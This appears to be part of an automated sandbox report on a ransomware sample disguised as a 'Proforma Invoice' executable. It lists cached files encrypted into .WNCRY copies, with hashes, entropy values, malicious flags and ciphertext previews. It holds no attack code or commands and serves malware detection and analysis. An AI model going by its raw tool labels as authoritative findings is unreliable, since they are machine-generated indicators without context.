                                                          SSDEEP:3072:LY1C/KjlHt9bGGKmUsThHqfmp2j3EJyjGyWhYVvkqO:LMt3bGG6yIfmpEoyjHWqVMqO
                                                          MD5:A09D4907451B742ED65ED7F56BFEA222
                                                          SHA1:A2B0106800A429810B95DACB28741876B8F026CB
                                                          SHA-256:306D032CBA47467B4625F8759B0F0E599ECCB1370EA84804B2677176A799828A
                                                          SHA-512:8B3A0EE9B415BC1E4291AB288A699599A9DE869A43DD9083CC6137EC7BCA9ECF043567A086D892E1ED1E5C1D8714DAC3C2707C2F0BE5E8CC6AB82BDF2DB1F4C3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....*.:..[....+..._y....5[.....+.;q....N...../r...d.]$.}t...a.vO....9-.<?.1..2tJ...R.Ik...m...g.N..T.,......h.t.r...... ...4.d'.....r..lx1.G>....'...b*..9..BO$..M=+..,..MN..7...y!.x.3....~J..........$.F.2.tI_upL.>..<.R.P.....4.....9V..f.K.%.W).U.............B|J..-.< .~.Sq..%........z....A.Nm.tM.g4...d..'s...e{.(.ci=..@...N.E..........;......;..).....WH%...gR_eK{.L5......f1#".I4.V../....k1.3...x...<K...=..P.+...M.%$....q]8..)M.*..i.F.]AU..s..L...z...D...,fG.8g..O.....~..f.j..241..].s7:..=.....^tJ.a._...~v..n.LX"..6u%./.:..[....i|BU.L6*=E.(.......y2.pCx......RY!..=...{.PLO..KT3T.Sa....p..#E...6t..}kU....f.\.gQ.....n).....U..H..Q....p.r...e&.C..R......0......}........v..D.t...&...Z...B4r.-..2"..G.H=).2!.X#.x............|.7.....Q....z.++q..!=...p.1,M..J~... ...q......?Q...CX.L.S....<...rc......a(DL.e...I.../.G...RSl:........$..:e..d.]........)X.....R .i.o.\i`.....3yq|&t..3.~i.Y..=.U.......O-I...De..k.s.k.M..{Q..u...).K.._.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[2].svg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):7.797085962455203
                                                          Encrypted:false
                                                          SSDEEP:24:bkGEnOmQULG8YMNFMgo/Pwq1P7te9pQkOtNwVTdW1ZoOw8f97+Oy3EBZ:bkGWbG8Zdo/YEP7tefIkdW1Zo2+UBZ
                                                          MD5:FB6C21D2B8E615040FFAB1FD5D2EF196
                                                          SHA1:02DBB556BF804E62DA3BEF09C30BA396471B91E1
                                                          SHA-256:FFDB582EE85B367F26FAB8DA240D9CB99BB02362520DDCEA70F0DFB8544DD6E9
                                                          SHA-512:0A126558B9471E8B856FDC1CFCEF7AC34C0C6DD602EFB599E927D9ACB42983D358E23121E6CCF60C40963E3AB72B67E46AEB9B0263A98B0E62B6263D39EC5406
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&k..4......"...: ......Q..*r..h...[?mv....p(...V./.J.XN.4.....yd.Y..)j`k...y......H..:e,...o`...6#.",...=!.\H...o....E7.$.........J.6...2./8H..#E.."i=T9.bA..|.O.N9......."..>.............bP..lv...T...V.x5......!.RG|.~.-.5.B..L.M\....K.tk..`b.....Q.......z.Z..).i.`.A.@.......^.....5...w.f.{B..Xem..{J.. ....w.;.5.X....1~.5..$. ?m..,A...2.&.9.M)1...."..T.)um(.Ru..\..v..w.)A..K8.uz.....#..m..J.9.[..O..8.....`.k.(...C....m.}.Y...sG.......!E..l..}..#...X.r..`.P.!:_...A..{..._........hdC.0B..SQ:.,...^y_Y.G...~.j...q.......o..m.x....1...i.....P..Tw=.v...".O..........S?b,.. h.`?./Cc....Xf....)...@..@.C.Z.Y.o.^..o.;....,.*.bm.....A.C......)..E.t D>.s.w.?=@*H.......=...R../la.k.w...[...~.#.K....fm......z80.o..`##..|.k.E.fc.R....XPpdZ....Q.....z.G.}...[%.s.X..8..Sv..K.....H....n..e..7..<..rZ}.1.D..U...+.MC.2.W[.<T..{K&...L.wZ.I=..]....Q...w..V...]pjC.......4.@..r....F.l..R!F.....+..eQ......G.2|$$=..}..-..=.Xu.>..FX..r...\...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[2].svg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):7.797085962455203
                                                          Encrypted:false
                                                          SSDEEP:24:bkGEnOmQULG8YMNFMgo/Pwq1P7te9pQkOtNwVTdW1ZoOw8f97+Oy3EBZ:bkGWbG8Zdo/YEP7tefIkdW1Zo2+UBZ
                                                          MD5:FB6C21D2B8E615040FFAB1FD5D2EF196
                                                          SHA1:02DBB556BF804E62DA3BEF09C30BA396471B91E1
                                                          SHA-256:FFDB582EE85B367F26FAB8DA240D9CB99BB02362520DDCEA70F0DFB8544DD6E9
                                                          SHA-512:0A126558B9471E8B856FDC1CFCEF7AC34C0C6DD602EFB599E927D9ACB42983D358E23121E6CCF60C40963E3AB72B67E46AEB9B0263A98B0E62B6263D39EC5406
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&k..4......"...: ......Q..*r..h...[?mv....p(...V./.J.XN.4.....yd.Y..)j`k...y......H..:e,...o`...6#.",...=!.\H...o....E7.$.........J.6...2./8H..#E.."i=T9.bA..|.O.N9......."..>.............bP..lv...T...V.x5......!.RG|.~.-.5.B..L.M\....K.tk..`b.....Q.......z.Z..).i.`.A.@.......^.....5...w.f.{B..Xem..{J.. ....w.;.5.X....1~.5..$. ?m..,A...2.&.9.M)1...."..T.)um(.Ru..\..v..w.)A..K8.uz.....#..m..J.9.[..O..8.....`.k.(...C....m.}.Y...sG.......!E..l..}..#...X.r..`.P.!:_...A..{..._........hdC.0B..SQ:.,...^y_Y.G...~.j...q.......o..m.x....1...i.....P..Tw=.v...".O..........S?b,.. h.`?./Cc....Xf....)...@..@.C.Z.Y.o.^..o.;....,.*.bm.....A.C......)..E.t D>.s.w.?=@*H.......=...R../la.k.w...[...~.#.K....fm......z80.o..`##..|.k.E.fc.R....XPpdZ....Q.....z.G.}...[%.s.X..8..Sv..K.....H....n..e..7..<..rZ}.1.D..U...+.MC.2.W[.<T..{K&...L.wZ.I=..]....Q...w..V...]pjC.......4.@..r....F.l..R!F.....+..eQ......G.2|$$=..}..-..=.Xu.>..FX..r...\...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[1].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.296936399603516
                                                          Encrypted:false
                                                          SSDEEP:6:bkEBFXGwnMJdeR0xAn54GDpd4rOj/kvlO6o86wwYRDPuEVZYB/ZSgVY4A:bkEf0JdeRIAq5rObkvl/lwwAxUgnA
                                                          MD5:7B325826DEF18E0AC6AFDEDC7CC9F6B5
                                                          SHA1:D372CBA711E926EEC9678F3978FC4A6860D66E36
                                                          SHA-256:425885B5D4FDAB39BCF435205D70390266FB720174B3B38ACFCCC9C874FD367B
                                                          SHA-512:A23371890B3B4261EFAA9FFFFCE749445B6F98A87D52EE34DD72D7A72C0C0753C6092EB383BC8C8071ACE6CA97E90907C31EAD8C2898255FC61D206A1D32222D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....,....T....}..0Or.....W.M_.U.@n.'...,.zk/./%.......w9..l.ZrvE.(G..wg.Y..a]Q.Y...)/.j..X..g.'dl4.m..._|...9.....U...k.FK..F..]..s.G~..].K#d.n.C4...f.D.\_..ML.Bm2.U...N.yf..o...k..>TV(S......T.).g@.{.7o.p0#`.zZ..5.V.h)v.k%...>P..U.x..rk..i..,!.9....+...........K=.....b.....p.>..'.3.Q..."k--.....k.E...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[1].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.296936399603516
                                                          Encrypted:false
                                                          SSDEEP:6:bkEBFXGwnMJdeR0xAn54GDpd4rOj/kvlO6o86wwYRDPuEVZYB/ZSgVY4A:bkEf0JdeRIAq5rObkvl/lwwAxUgnA
                                                          MD5:7B325826DEF18E0AC6AFDEDC7CC9F6B5
                                                          SHA1:D372CBA711E926EEC9678F3978FC4A6860D66E36
                                                          SHA-256:425885B5D4FDAB39BCF435205D70390266FB720174B3B38ACFCCC9C874FD367B
                                                          SHA-512:A23371890B3B4261EFAA9FFFFCE749445B6F98A87D52EE34DD72D7A72C0C0753C6092EB383BC8C8071ACE6CA97E90907C31EAD8C2898255FC61D206A1D32222D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....,....T....}..0Or.....W.M_.U.@n.'...,.zk/./%.......w9..l.ZrvE.(G..wg.Y..a]Q.Y...)/.j..X..g.'dl4.m..._|...9.....U...k.FK..F..]..s.G~..].K#d.n.C4...f.D.\_..ML.Bm2.U...N.yf..o...k..>TV(S......T.).g@.{.7o.p0#`.zZ..5.V.h)v.k%...>P..U.x..rk..i..,!.9....+...........K=.....b.....p.>..'.3.Q..."k--.....k.E...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[2].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.240082399737887
                                                          Encrypted:false
                                                          SSDEEP:6:bkEpyHTRqOxnItNU5ArPCqJDQ5ALl1BJ+es1+ewQdLdkXEaJMCgL:bkEul7JcPXNma+Z+ewQrkHkL
                                                          MD5:E7C6FE43B0DFF72BD58DEE653BCF991F
                                                          SHA1:34C458BADAD70EA787D46CCCCE0692C882248F5F
                                                          SHA-256:15E9BE0553E55A7082D28FD5A49ED6E76964B1963D9A62BDD9BB98F928D56458
                                                          SHA-512:E9900E23546F9EBC387CB6EFA4DA2791FF32831450479C63A13C920808422EF225BE94C3A23031876B28734820A471820F426D2B7FDF7C8998E608DA53AAD901
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..... z.n...Y........(.0........k4.O.eT=......1S....-..o........s&V=..S.!.8..U.!.H../.......d./E.p..q...}......z.<...V.|.@B&..P..&....W8+D...M.dd...x............d....*..T.....h.gy..\VhX5e...z..=6..P.X....";.].9...1.....@........-.^^l.....,8.ae8?..m....+..........m..x.>.......&.......C...i..;.....Y..p....g.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[2].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.240082399737887
                                                          Encrypted:false
                                                          SSDEEP:6:bkEpyHTRqOxnItNU5ArPCqJDQ5ALl1BJ+es1+ewQdLdkXEaJMCgL:bkEul7JcPXNma+Z+ewQrkHkL
                                                          MD5:E7C6FE43B0DFF72BD58DEE653BCF991F
                                                          SHA1:34C458BADAD70EA787D46CCCCE0692C882248F5F
                                                          SHA-256:15E9BE0553E55A7082D28FD5A49ED6E76964B1963D9A62BDD9BB98F928D56458
                                                          SHA-512:E9900E23546F9EBC387CB6EFA4DA2791FF32831450479C63A13C920808422EF225BE94C3A23031876B28734820A471820F426D2B7FDF7C8998E608DA53AAD901
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..... z.n...Y........(.0........k4.O.eT=......1S....-..o........s&V=..S.!.8..U.!.H../.......d./E.p..q...}......z.<...V.|.@B&..P..&....W8+D...M.dd...x............d....*..T.....h.gy..\VhX5e...z..=6..P.X....";.].9...1.....@........-.^^l.....,8.ae8?..m....+..........m..x.>.......&.......C...i..;.....Y..p....g.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[3].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.228360274730553
                                                          Encrypted:false
                                                          SSDEEP:6:bkEKpZC6H6UPCNzOVDNcVspzAffscPCYdWOAjeJwch03ihbffx:bkEyZC6fCNzOVDNcVspXfYcvjeJZd7fx
                                                          MD5:AAC4E0B9E30CE4425E8BE472E0F983C6
                                                          SHA1:3C909081A50E092E68AE11AFED2357C688D65A51
                                                          SHA-256:8201E808030D5F90136D205F6842A07E30D42CB34D3C5FD30233B2C15BB7FC45
                                                          SHA-512:54EFCBAA3333B2BAD4794DFBEAD9132C8D7313EF7AACC6B712618D9A97D6C90B1ABD652EBF5C472475E7969491AC92D2C90E7C6E5D0E974D1C34E47221B95B53
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e.3.......'..L.L:.N%..KcY..Hw.....;...M.....H0..I.k..e.aO'.m.....&.cj...5g......C..smN.a...H?Wm6.T..p..%.,7._...6........,*&..+.s....8/..Zn8..>..1..3.......T6/.rea.1<B.h...n....I.........%..\p...w7..6..*...9..F.....\q.9f.%.E...}..9~....>j/..V.....+.........0.c.}.....e.yu..|........0^.0...C.E.[.b.2.I.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[3].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.228360274730553
                                                          Encrypted:false
                                                          SSDEEP:6:bkEKpZC6H6UPCNzOVDNcVspzAffscPCYdWOAjeJwch03ihbffx:bkEyZC6fCNzOVDNcVspXfYcvjeJZd7fx
                                                          MD5:AAC4E0B9E30CE4425E8BE472E0F983C6
                                                          SHA1:3C909081A50E092E68AE11AFED2357C688D65A51
                                                          SHA-256:8201E808030D5F90136D205F6842A07E30D42CB34D3C5FD30233B2C15BB7FC45
                                                          SHA-512:54EFCBAA3333B2BAD4794DFBEAD9132C8D7313EF7AACC6B712618D9A97D6C90B1ABD652EBF5C472475E7969491AC92D2C90E7C6E5D0E974D1C34E47221B95B53
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e.3.......'..L.L:.N%..KcY..Hw.....;...M.....H0..I.k..e.aO'.m.....&.cj...5g......C..smN.a...H?Wm6.T..p..%.,7._...6........,*&..+.s....8/..Zn8..>..1..3.......T6/.rea.1<B.h...n....I.........%..\p...w7..6..*...9..F.....\q.9f.%.E...}..9~....>j/..V.....+.........0.c.}.....e.yu..|........0^.0...C.E.[.b.2.I.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[4].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.3210709939964875
                                                          Encrypted:false
                                                          SSDEEP:6:bkEvSb8pp6ZHmVS+PoKZle0scizt0weYL9MTPNAGaVBn5tBSWlZqPFab81cFylO5:bkEvM8vmHmVVPoilkXGwea9MTPSDnJSi
                                                          MD5:B0EA714C735F93FDA7A11689FABDF0C5
                                                          SHA1:CBFBCF316F891449DAE587D78DDA11131FDDACC8
                                                          SHA-256:C7DDBC715A1D5894B32C243111FDD3374704BF67B4C7239F7D5A4A763AC768E9
                                                          SHA-512:0A9156E2B233A76C83F800834196B84341C4B03F4D9777D771DA5CCCA8C2E1A39C7F836BEE3A204836F91B722CCC3597A12ACE5999D4D6F465A60B1776A99EDE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Y..C6...u.g..&.n.k.4.....e.MF.B2_k....h1u.%..5.A...\C..0....S.z../@..=.n...4...?8li(...9M.(..2[ja..L..Y.y.hy.J..=QO...g{...,....uOH#b..X..K... ..q......%35....F)>0...N$>T.>.v....0...L$.Pv..j...4.?s.....R.i.-..p.....\|.0...d~`......g|...Y-Q..hX.....+........b$.q.....m.&...SL*..Nh.....~ .6_.I...lQP..@..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[4].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.3210709939964875
                                                          Encrypted:false
                                                          SSDEEP:6:bkEvSb8pp6ZHmVS+PoKZle0scizt0weYL9MTPNAGaVBn5tBSWlZqPFab81cFylO5:bkEvM8vmHmVVPoilkXGwea9MTPSDnJSi
                                                          MD5:B0EA714C735F93FDA7A11689FABDF0C5
                                                          SHA1:CBFBCF316F891449DAE587D78DDA11131FDDACC8
                                                          SHA-256:C7DDBC715A1D5894B32C243111FDD3374704BF67B4C7239F7D5A4A763AC768E9
                                                          SHA-512:0A9156E2B233A76C83F800834196B84341C4B03F4D9777D771DA5CCCA8C2E1A39C7F836BEE3A204836F91B722CCC3597A12ACE5999D4D6F465A60B1776A99EDE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Y..C6...u.g..&.n.k.4.....e.MF.B2_k....h1u.%..5.A...\C..0....S.z../@..=.n...4...?8li(...9M.(..2[ja..L..Y.y.hy.J..=QO...g{...,....uOH#b..X..K... ..q......%35....F)>0...N$>T.>.v....0...L$.Pv..j...4.?s.....R.i.-..p.....\|.0...d~`......g|...Y-Q..hX.....+........b$.q.....m.&...SL*..Nh.....~ .6_.I...lQP..@..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[5].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.207597576469431
                                                          Encrypted:false
                                                          SSDEEP:6:bkEdKo+SgF2dONFUFG/vqFLRL7YBrgG2bv15gutm0yIEYXrKXEkimbsI:bkEIRUFGaxmrl2tvuUkimbp
                                                          MD5:5F1FEDC2046B7A5C06283DC2539CAC18
                                                          SHA1:86057B08C36CA84389C5786CD6BA7509273A4F48
                                                          SHA-256:184EEA658EA5BD460F4AD46A0DEBED275E3C4F87CA25E00C68CEAC62F890325D
                                                          SHA-512:48968CCBA8CC544C16CD6D3F0210BA2063AAAB1E5F05663244932FFDCDDC2DAA8D4285AAD5502C132795E802765EFBF40FF6BA3F2F88ED4DDBA2096F8B180E35
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....<...4..8=.......Ry....38.?6..V3q@..`x...!.9.%......<.....T!.M...E...........g....>l...r`)..... #@.........qn.t..5O.......!.$.P.Z....\..._i....]?s...R..`.6v..6.... ..=n.%..p.0.....U.......G...<.\L'.T..pE..,r..N%>..W...V,.Z.C...8...:.k.':.Mo....+.......c.!_.-q...Z...f.(l7=..$....@5....:.@0%:....?|C..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\trans[5].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.207597576469431
                                                          Encrypted:false
                                                          SSDEEP:6:bkEdKo+SgF2dONFUFG/vqFLRL7YBrgG2bv15gutm0yIEYXrKXEkimbsI:bkEIRUFGaxmrl2tvuUkimbp
                                                          MD5:5F1FEDC2046B7A5C06283DC2539CAC18
                                                          SHA1:86057B08C36CA84389C5786CD6BA7509273A4F48
                                                          SHA-256:184EEA658EA5BD460F4AD46A0DEBED275E3C4F87CA25E00C68CEAC62F890325D
                                                          SHA-512:48968CCBA8CC544C16CD6D3F0210BA2063AAAB1E5F05663244932FFDCDDC2DAA8D4285AAD5502C132795E802765EFBF40FF6BA3F2F88ED4DDBA2096F8B180E35
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....<...4..8=.......Ry....38.?6..V3q@..`x...!.9.%......<.....T!.M...E...........g....>l...r`)..... #@.........qn.t..5O.......!.$.P.Z....\..._i....]?s...R..`.6v..6.... ..=n.%..p.0.....U.......G...<.\L'.T..pE..,r..N%>..W...V,.Z.C...8...:.k.':.Mo....+.......c.!_.-q...Z...f.(l7=..$....@5....:.@0%:....?|C..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20552
                                                          Entropy (8bit):7.991750473485933
                                                          Encrypted:true
                                                          SSDEEP:384:wRnvf+7uEOnvGnwE+n/RU1oIGFOAEM+W/7Ot/UX0I2QD6zrYDdbP64fyFHB/:8nXg3SvK+nBIMOAEu5OQD6zrYDdriHB/
                                                          MD5:DD77CD5BE768BF89D8A0AF4684F5775C
                                                          SHA1:61486BED9503C284FD394C0AD98E170227529894
                                                          SHA-256:2E66137E1607FBC0F67EF74D3A5C23CF4656ECE36CA9A07E76CA31121E82806C
                                                          SHA-512:CB374C98DF77860F95AB0C1A098AC479A71BB28B43500AED75E8D177677A2E73549D1DD2147FBE17C68E8E3C8E9E74F7A4378B35294163CEE2553AD077C531DE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C.._....%.Q...I.7'......c.5...h}....|.......zxV.)n^..h....6...F.L.I.6fG.Hp.....MT..|..;.f..&..~..W.....%.-...).k..S..1.".S..9jdk..K..3.+74U.....n..]3......r...H.7.W...^1..w........".E.P..$/.../#.....O..V"V.....E..@^.!.K.P..M.S..w^.(A.[.,DT.....$O..........0H."....}.9..b.CX.vT...G..]..;..56...k........8'..).f!.X.._..=."v.J......xB....b..p.y....8..ZM...I.A.]>.F[Z.4..<B.t..1.G..z..<.....|.Wx.9..'...#......+"..$O`kZ...M.P...G7=.!..]DE.Q....;&..}...8J...?......l.....a..wS.%../2E.@...E...n.$...7...P~Dv$.E.......|..*fDNac...\.....<b.-X.. .t......`."...>..l...B.R....i...x.+......|...{.l~Y+....6.S..h>kt .]..N.?.EJ..$.Y..Au.?.[....'.E....8,IjZj..KJ@U.&i.*^..m..0...,...'..P.S..w#@.....F... .--..q.I.}..4../.[L...w)...7.).{]9..q)....6..x..j.....Y..D.".....?.[G.\A.a....{.X,..d.....'...<.>..............&}....7.]pb...Ph....;G"0.v6.)G....q.>*.C....D.a73...q$....z.9[....N.#..X.....(2......<H..."......*..26i.v..Z..2..mp.....;....'.-.6...<cd...j

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20552
                                                          Entropy (8bit):7.991750473485933
                                                          Encrypted:true
                                                          SSDEEP:384:wRnvf+7uEOnvGnwE+n/RU1oIGFOAEM+W/7Ot/UX0I2QD6zrYDdbP64fyFHB/:8nXg3SvK+nBIMOAEu5OQD6zrYDdriHB/
                                                          MD5:DD77CD5BE768BF89D8A0AF4684F5775C
                                                          SHA1:61486BED9503C284FD394C0AD98E170227529894
                                                          SHA-256:2E66137E1607FBC0F67EF74D3A5C23CF4656ECE36CA9A07E76CA31121E82806C
                                                          SHA-512:CB374C98DF77860F95AB0C1A098AC479A71BB28B43500AED75E8D177677A2E73549D1DD2147FBE17C68E8E3C8E9E74F7A4378B35294163CEE2553AD077C531DE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C.._....%.Q...I.7'......c.5...h}....|.......zxV.)n^..h....6...F.L.I.6fG.Hp.....MT..|..;.f..&..~..W.....%.-...).k..S..1.".S..9jdk..K..3.+74U.....n..]3......r...H.7.W...^1..w........".E.P..$/.../#.....O..V"V.....E..@^.!.K.P..M.S..w^.(A.[.,DT.....$O..........0H."....}.9..b.CX.vT...G..]..;..56...k........8'..).f!.X.._..=."v.J......xB....b..p.y....8..ZM...I.A.]>.F[Z.4..<B.t..1.G..z..<.....|.Wx.9..'...#......+"..$O`kZ...M.P...G7=.!..]DE.Q....;&..}...8J...?......l.....a..wS.%../2E.@...E...n.$...7...P~Dv$.E.......|..*fDNac...\.....<b.-X.. .t......`."...>..l...B.R....i...x.+......|...{.l~Y+....6.S..h>kt .]..N.?.EJ..$.Y..Au.?.[....'.E....8,IjZj..KJ@U.&i.*^..m..0...,...'..P.S..w#@.....F... .--..q.I.}..4../.[L...w)...7.).{]9..q)....6..x..j.....Y..D.".....?.[G.\A.a....{.X,..d.....'...<.>..............&}....7.]pb...Ph....;G"0.v6.)G....q.>*.C....D.a73...q$....z.9[....N.#..X.....(2......<H..."......*..26i.v..Z..2..mp.....;....'.-.6...<cd...j

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13880
                                                          Entropy (8bit):7.988528808361626
                                                          Encrypted:false
                                                          SSDEEP:384:uI8NcPmHqm2Q+VZsmK9BSYteuZxhDEYKR5K:uIlPCkTlK9BSYt9HhwYKR5K
                                                          MD5:84DC34012611EFCAAA15CD5D7D5923F3
                                                          SHA1:0BCF8B2B568D77484F7F3A0CE04C0B9C491463F5
                                                          SHA-256:3C5AD22801C9F713D5F4D9BF3ECE4DE1491B468CC8BDA606C6243BFACB0EB208
                                                          SHA-512:2E45C4358AE92AD259856AB348E6877A118D4B0262D46D253FC15F597F7A8C8B325FF72DE0E128EED3BB5C5DA8FDC48353B8AB67DE246B4ABF1E06E5A088B15F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....h..}^...{.../.....+.-J..7..MM...*......?...N..g;..^f.8..;...)W..F..@.....qw....ND...#K.:.l.zd.3B..._...`.D..s.n.`}.78...9=..n..m..MF.p*].!g.E.X.....B5...K...B..H.a>....H....-> .h....J.(^C.3..|.....q|<.[...W."...d.r3c.zB...S-..F.-.k....#Ka{..u......5.............y.....c.?.g.;.h..h.W*..e.t..6"M~...'........k\H.....E...|F.1y._PvP..B.4.R.ak.............O...M..jV(H.f..L...8.W..."b!.8.Q..t..*..&...T...".M.4.cg..0T..pe.s>.h.......&m..\..z)_.w...hBRh.......AV.7..X<O.8....r.}....m..0..V.I"?(+..o.:8........%-......V.vi......a0,......+.W.N..."......G..&..b.8.5....9...s].B..s..B"...3n.@e."......p...E,...1.C..#.......H.6....nw.'......5tal'.0.1...P.._......I.Iq...}.8O...6.#..)....... ..........._..r....`"...K..nV......g...4..!.}. h._..7.A.....9.......$.._....q.4......A.^...a..\&..$o.._..I=v.[.@..Fo'.S.|VZ..Sh?.0.......3.5.t.x.qG.g.l....c.....m......T_...O.s...q....V.#l...^k}xh....V.'.....L.~.$.!...&.YV...JE..yLGG.L..s...b1.Gc.p..Mz.gXy21*....a{)5..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13880
                                                          Entropy (8bit):7.988528808361626
                                                          Encrypted:false
                                                          SSDEEP:384:uI8NcPmHqm2Q+VZsmK9BSYteuZxhDEYKR5K:uIlPCkTlK9BSYt9HhwYKR5K
                                                          MD5:84DC34012611EFCAAA15CD5D7D5923F3
                                                          SHA1:0BCF8B2B568D77484F7F3A0CE04C0B9C491463F5
                                                          SHA-256:3C5AD22801C9F713D5F4D9BF3ECE4DE1491B468CC8BDA606C6243BFACB0EB208
                                                          SHA-512:2E45C4358AE92AD259856AB348E6877A118D4B0262D46D253FC15F597F7A8C8B325FF72DE0E128EED3BB5C5DA8FDC48353B8AB67DE246B4ABF1E06E5A088B15F
                                                          Malicious:false
                                                          Reputation:unknown
